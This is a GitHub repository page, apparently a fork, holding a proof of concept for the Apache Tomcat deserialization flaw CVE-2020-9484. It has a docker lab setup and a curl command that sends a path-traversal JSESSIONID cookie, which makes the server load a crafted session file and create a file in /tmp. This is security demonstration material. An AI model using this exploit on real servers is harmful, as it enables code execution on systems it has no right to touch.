Skip to content
/ CVE-2020-9485 Public
forked from ColdFusionX/CVE-2020-9484

POC - Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

0 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

5l1v3r1/CVE-2020-9485

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits

README.md

README.md

 
 

cfx.session

cfx.session

 
 

commons-collections4-4.0.jar

commons-collections4-4.0.jar

 
 

context.xml

context.xml

 
 

docker-compose.yml

docker-compose.yml

 
 

index.jsp

index.jsp

 
 

poc.png

poc.png

 
 

Repository files navigation

Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

Vulnerable target setup

  • Clone this repository
  • Run docker-compose up -d
  • That's it !

Exploit POC

  • Run curl -v 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/cfx

poc

  • File named coldfx gets created in tmp directory

About

POC - Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Java 100.0%